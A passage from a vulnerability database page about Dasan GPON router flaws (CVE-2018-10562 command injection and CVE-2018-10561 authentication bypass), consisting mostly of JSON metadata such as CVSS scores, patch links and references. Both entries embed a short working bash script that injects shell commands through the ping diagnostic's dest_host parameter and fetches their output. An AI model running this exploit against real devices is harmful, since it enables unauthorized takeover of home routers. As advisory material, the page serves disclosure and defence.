Search
Find a vulnerability
Search criteria
9 vulnerabilities by dasannetworks
VAR-201805-0263
Vulnerability from variot - Updated: 2025-11-18 15:27An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. Dasan GPON home routers Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could use the vulnerability to execute a command and retrieve the output by sending a diag_action=ping request with the \342\200\230dest_host\342\200\231 parameter to GponForm/diag_FormURI. Multiple Dasan GPON Routers is prone to an authentication-bypass vulnerability and a command-injection vulnerability. An attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. #!/bin/bash
echo "[+] Sending the Commanda| "
We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`$2`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null echo "[+] Waitinga|." sleep 3 echo "[+] Retrieving the ouputa|." curl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\n/\n/ga
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0263",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gpon router",
"scope": "eq",
"trust": 1.6,
"vendor": "dasannetworks",
"version": null
},
{
"model": "gpon routers",
"scope": null,
"trust": 0.8,
"vendor": "dasan",
"version": null
},
{
"model": "networks gpon",
"scope": null,
"trust": 0.6,
"vendor": "dasan",
"version": null
},
{
"model": "networks gpon router",
"scope": "eq",
"trust": 0.3,
"vendor": "dasan",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-188"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
},
{
"db": "NVD",
"id": "CVE-2018-10562"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:dasannetworks:gpon_router_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "None",
"sources": [
{
"db": "BID",
"id": "107053"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-188"
}
],
"trust": 0.9
},
"cve": "CVE-2018-10562",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-10562",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-09165",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-120334",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-10562",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-10562",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-10562",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2018-10562",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2018-10562",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-09165",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-188",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-120334",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-10562",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"db": "VULHUB",
"id": "VHN-120334"
},
{
"db": "VULMON",
"id": "CVE-2018-10562"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-188"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
},
{
"db": "NVD",
"id": "CVE-2018-10562"
},
{
"db": "NVD",
"id": "CVE-2018-10562"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it\u0027s quite simple to execute commands and retrieve their output. Dasan GPON home routers Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could use the vulnerability to execute a command and retrieve the output by sending a diag_action=ping request with the \\342\\200\\230dest_host\\342\\200\\231 parameter to GponForm/diag_FormURI. Multiple Dasan GPON Routers is prone to an authentication-bypass vulnerability and a command-injection vulnerability. \nAn attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. #!/bin/bash\n \necho \"[+] Sending the Commanda| \"\n# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices\ncurl -k -d \"XWebPageName=diag\u0026diag_action=ping\u0026wan_conlist=0\u0026dest_host=\\`$2\\`;$2\u0026ipv=0\" $1/GponForm/diag_Form?images/ 2\u003e/dev/null 1\u003e/dev/null\necho \"[+] Waitinga|.\"\nsleep 3\necho \"[+] Retrieving the ouputa|.\"\ncurl -k $1/diag.html?images/ 2\u003e/dev/null | grep adiag_result = a | sed -e as/\\\\n/\\n/ga\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10562"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
},
{
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "VULHUB",
"id": "VHN-120334"
},
{
"db": "VULMON",
"id": "CVE-2018-10562"
},
{
"db": "PACKETSTORM",
"id": "147482"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-120334",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=44576",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120334"
},
{
"db": "VULMON",
"id": "CVE-2018-10562"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-10562",
"trust": 3.6
},
{
"db": "EXPLOIT-DB",
"id": "44576",
"trust": 2.6
},
{
"db": "BID",
"id": "107053",
"trust": 2.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004886",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201805-188",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-09165",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-120334",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10562",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "147482",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"db": "VULHUB",
"id": "VHN-120334"
},
{
"db": "VULMON",
"id": "CVE-2018-10562"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "PACKETSTORM",
"id": "147482"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-188"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
},
{
"db": "NVD",
"id": "CVE-2018-10562"
}
]
},
"id": "VAR-201805-0263",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"db": "VULHUB",
"id": "VHN-120334"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09165"
}
]
},
"last_update_date": "2025-11-18T15:27:33.715000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dasannetworks.com/en/"
},
{
"title": "GPon router remote command execution vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/128481"
},
{
"title": "Dasan GPON Home router command injection vulnerability fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79884"
},
{
"title": "Pingpon-Exploit",
"trust": 0.1,
"url": "https://github.com/649/Pingpon-Exploit "
},
{
"title": "GPON_RCE",
"trust": 0.1,
"url": "https://github.com/c0ld1/GPON_RCE "
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/Truongnn92/GPON "
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/f3d0x0/GPON "
},
{
"title": "GPON-LOADER",
"trust": 0.1,
"url": "https://github.com/Choudai/GPON-LOADER "
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/manyunya/GPON "
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/ethicalhackeragnidhra/GPON "
},
{
"title": "GPON-home-routers-Exploit",
"trust": 0.1,
"url": "https://github.com/vhackor/GPON-home-routers-Exploit "
},
{
"title": "CVE-2018-10562",
"trust": 0.1,
"url": "https://github.com/ATpiu/CVE-2018-10562 "
},
{
"title": "awesome-network-stuff",
"trust": 0.1,
"url": "https://github.com/alphaSeclab/awesome-network-stuff "
},
{
"title": "awesome-network-stuff",
"trust": 0.1,
"url": "https://github.com/aniksarakash/awesome-network-stuff "
},
{
"title": "MS17-010",
"trust": 0.1,
"url": "https://github.com/oneplus-x/MS17-010 "
},
{
"title": "Exp101tsArchiv30thers",
"trust": 0.1,
"url": "https://github.com/nu11secur1ty/Exp101tsArchiv30thers "
},
{
"title": "CVE-POC",
"trust": 0.1,
"url": "https://github.com/0xT11/CVE-POC "
},
{
"title": "awesome-cve-poc_qazbnm456",
"trust": 0.1,
"url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 "
},
{
"title": "PoC-in-GitHub",
"trust": 0.1,
"url": "https://github.com/nomi-sec/PoC-in-GitHub "
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/inside-hoaxcalls-botnet-success-failure/156107/"
},
{
"title": "BleepingComputer",
"trust": 0.1,
"url": "https://www.bleepingcomputer.com/news/security/gpon-routers-attacked-with-new-zero-day/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"db": "VULMON",
"id": "CVE-2018-10562"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-188"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-77",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120334"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
},
{
"db": "NVD",
"id": "CVE-2018-10562"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://www.securityfocus.com/bid/107053"
},
{
"trust": 2.7,
"url": "https://www.exploit-db.com/exploits/44576/"
},
{
"trust": 2.1,
"url": "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/"
},
{
"trust": 1.0,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2018-10562"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10562"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10562"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10652"
},
{
"trust": 0.3,
"url": "http://www.dasannetworks.com/en/"
},
{
"trust": 0.3,
"url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-603"
},
{
"trust": 0.3,
"url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-604"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://github.com/649/pingpon-exploit"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10561"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"db": "VULHUB",
"id": "VHN-120334"
},
{
"db": "VULMON",
"id": "CVE-2018-10562"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "PACKETSTORM",
"id": "147482"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-188"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
},
{
"db": "NVD",
"id": "CVE-2018-10562"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"db": "VULHUB",
"id": "VHN-120334"
},
{
"db": "VULMON",
"id": "CVE-2018-10562"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "PACKETSTORM",
"id": "147482"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-188"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
},
{
"db": "NVD",
"id": "CVE-2018-10562"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-05-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"date": "2018-05-04T00:00:00",
"db": "VULHUB",
"id": "VHN-120334"
},
{
"date": "2018-05-04T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10562"
},
{
"date": "2019-02-18T00:00:00",
"db": "BID",
"id": "107053"
},
{
"date": "2018-05-04T00:32:22",
"db": "PACKETSTORM",
"id": "147482"
},
{
"date": "2018-05-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-188"
},
{
"date": "2018-06-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-004886"
},
{
"date": "2018-05-04T03:29:00.287000",
"db": "NVD",
"id": "CVE-2018-10562"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-01-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-120334"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10562"
},
{
"date": "2019-02-18T00:00:00",
"db": "BID",
"id": "107053"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-188"
},
{
"date": "2018-06-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-004886"
},
{
"date": "2025-11-05T19:23:09.917000",
"db": "NVD",
"id": "CVE-2018-10562"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-188"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dasan GPON home routers Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-188"
}
],
"trust": 0.6
}
}
VAR-201805-0262
Vulnerability from variot - Updated: 2025-11-18 15:27An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending "?images" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device. Dasan GPON home router Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could exploit the vulnerability by bypassing the vulnerability by adding \342\200\230?images\342\200\231 to any of the device's URLs. Multiple Dasan GPON Routers is prone to an authentication-bypass vulnerability and a command-injection vulnerability. An attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. #!/bin/bash
echo "[+] Sending the Commanda| "
We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`$2`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null echo "[+] Waitinga|." sleep 3 echo "[+] Retrieving the ouputa|." curl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\n/\n/ga
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0262",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gpon router",
"scope": "eq",
"trust": 1.6,
"vendor": "dasannetworks",
"version": null
},
{
"model": "gpon routers",
"scope": null,
"trust": 0.8,
"vendor": "dasan",
"version": null
},
{
"model": "networks gpon",
"scope": null,
"trust": 0.6,
"vendor": "dasan",
"version": null
},
{
"model": "networks gpon router",
"scope": "eq",
"trust": 0.3,
"vendor": "dasan",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:dasannetworks:gpon_router_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "None",
"sources": [
{
"db": "BID",
"id": "107053"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
}
],
"trust": 0.9
},
"cve": "CVE-2018-10561",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-10561",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-09230",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-120333",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-10561",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
